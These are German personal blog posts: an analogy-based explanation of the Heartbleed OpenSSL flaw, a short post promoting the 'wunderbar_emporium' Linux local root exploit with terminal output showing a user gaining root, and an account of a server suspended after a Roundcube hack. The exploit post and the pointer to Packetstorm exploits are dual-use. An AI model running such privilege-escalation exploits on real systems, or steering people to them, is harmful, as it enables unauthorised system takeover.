Ein Versuch #Heartbleed fuer nicht-Techniker verstaendlich zu machen

heartbleed

Eigentlich sollte ich keine Zeit haben zu schreiben, aber das ist die mit Abstand krasseste Sicherheitsluecke die es seit langem gegeben hat. Das Ausmass kann man nur erahnen, im Prinzip muessen alle persoenlichen Daten auf einem System das den Fehler hatte als unsicher erachtet werden. Es reicht nicht die gepatchte Version von OpenSSL einzuspielen und die betroffenen Prozesse wie Apache, Postfix, Dovecot oder OpenVPN neu zu starten. Es muessen private Schluessel und Zertifikate erneuert werden und wer den Konsequenzen der Luecke klar ins Gesicht schaut wird auch ueberall Passwoerter neu setzen muessen.

Heute beim Kaffee und Kuchen fragte unsere Nachbarin wie man sich das vorstellen koennte und ich habe versucht es wie folgt zu erklaeren:

Stell Dir vor auf dieser Welt gibt es einen Hersteller fuer Haustuerschloesser. Dieser Hersteller baut sehr sichere Schloesser und man kann sich darauf verlassen, dass wenn man seine Haustuer mit einem Schloss dieser Marke schuetzt, dass dort nicht eingebrochen werden kann. Das Schloss ist in diesen Fall OpenSSL, und das Haus der Server selbst.

Vor ein paar Jahren gab es dann den Trend zu sogenannter Perfect Forward Secrecy. Im uebertragenen Sinne kann man sich das so vorstellen, dass das Schloss kontinuierlich neue Schluessel generiert die jedes mal anders sind. Gelangt also mal ein Haustuerschluessel in die falschen Haende, dann kann man damit trotzdem nichts mehr anfangen, weil das Schloss sich geaendert hat.

Die Sicherheitsluecke in OpenSSL erlaubt es, das man von extern, ohne, dass man auf den Server einbrechen muss, an sehr sehr private Daten gelangen kann. Das koennen Zugangsdaten sein oder auch der private Key, mit dem man sich dann fuer den Server ausgeben kann ohne eben dieser zu sein.

Wenn man das wieder auf den Schlosshersteller und das Haus zurueckbringt, dann stelle man sich vor, das man zu jedem Haus mit einem Schloss von diesem Schlosshersteller hingehen kann, und ohne einzubrechen bekommt man die Information wie das Schloss jetzt Schluessel generiert. Man muss nichts stehlen, man muss nichts kaputt machen, man geht einfach hin und fragt und das Schloss sagt es einem.

Auch wenn in dem Beispiel viele Dinge vielleicht als Vergleich hinken, es zeigt ziemlich einfach welche Tragweite die Sicherheitsluecke hat. Man kann ja von aussen nicht sehen „ob jemand vorbeigekommen ist und gefragt hat wie sich das Schloss aendert oder nicht“. Aus diesem Grund muss man alle Server auf denen OpenSSL in der betroffenen Version eingesetzt wurde als unsicher betrachten. Der Fehler existiert seit dem 14. Maerz 2012 und man muss also davon ausgehen, dass es Menschen / Organisationen gibt, die seit zwei Jahren in alles rein gucken konnten was man irgendwie sichern wollte.

Fuer Sysadmins ist das der Supergau…

Eine ganz gute Zusammenfassung zu dem Thema gibt es bei Golem:

Weitere Infos:

Wer seine eigene Infrastruktur testen moechte (Router, NAS, Drucket etc) kann mit dem heartbleeder lokale IP Adressen probieren und findet dann auf einschlaegigen Seiten wie Packetstormsecurity die entsprechenden Exploits…

local root exploit fuer alle linux kernel seit 2001

Es gibt einen neuen local root exploit fuer den Linux Kernel fuer alle 2.4er und 2.6er Kernel seit 2001. Funktioniert ganz wunderbar hier und ueberall, einfach wunderbar_emporium herunterladen und ausfuehren und siehe selbst:

jan@scherge:~/wunderbar_emporium$ id
uid=1003(jan) gid=1003(jan) Gruppen=114(wheel),1003(jan),1004(userbet)
jan@scherge:~/wunderbar_emporium$ ./wunderbar_emporium.sh 
 [+] MAPPED ZERO PAGE!
 [+] Resolved sel_read_enforce to 0xffffffff802f334a
 [+] got ring0!
 [+] detected 2.6 style 4k stacks
sh: mplayer: command not found
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Got root!
sh-3.1# id
uid=0(root) gid=0(root) Gruppen=114(wheel),1003(jan),1004(userbet)
sh-3.1#

Blog downtime am Wochenende

Am Wochenende war mein Blog nicht zu erreihen (zwitscher). Seit Montag ist er nun wieder da, und wie angekuendigt (zwitscher) hier 2-3 Zeilen dazu…

Ich habe mir mit drei weiteren Freunden (Eins, Zwei, Drei) einen Rootserver bei Hetzner gemietet. Darauf haben wir mit xen fuer jeden von uns eine virtuelle Maschine, und noch Luft und Platz nach oben was weitere angeht. Jeder von uns, hat (natuerlich) auch einen eigenen Mailserver. Thomas hat seine roundcube Installation nicht upgedated, was zur Folge hatte, dass – klassisch – durch eine bekannt gewordene Sicherheitsluecke und ein schnell im Netz auftauchendes exploit jemand die roundcube Installation gehackt und missbraucht hat. Hetzner hat daraufhin den Server gesperrt. Ueber das Wochenende gab es keinen kostenlosen technischen Support, weswegen das ganze Prozedere (serielle Konsole beantragen, Untersuchen, Formblatt ausfuellen und faxen etc) dann bis Montag gedauert hat. Danke an Matthias an dieser Stelle, dass Du das alles gemacht hast! Thomas ist open to abuse.

Was lernen wir alle nun daraus?? Ich kann mich nur auf mich selber verlassen?! Immer schoen alle Sicherheitsupdates installieren?! Keine Pakete von Hand installieren dessen Newsfeed ich nicht lese?! Wenn jemand auf der Arbeit mit Linux-Servern zu tun hat, dann sind die privaten Systeme immer die unsichersten?! Wenn ich mir etwas teile, dann habe ich nicht nur fuer meinen Teil Verantwortung?! … Und immer so weiter… Ich mach mir auf jeden Fall meine Gedanken dazu, und bin gespannt, was Thomas an Kaffee und Kuchen ausgiebt.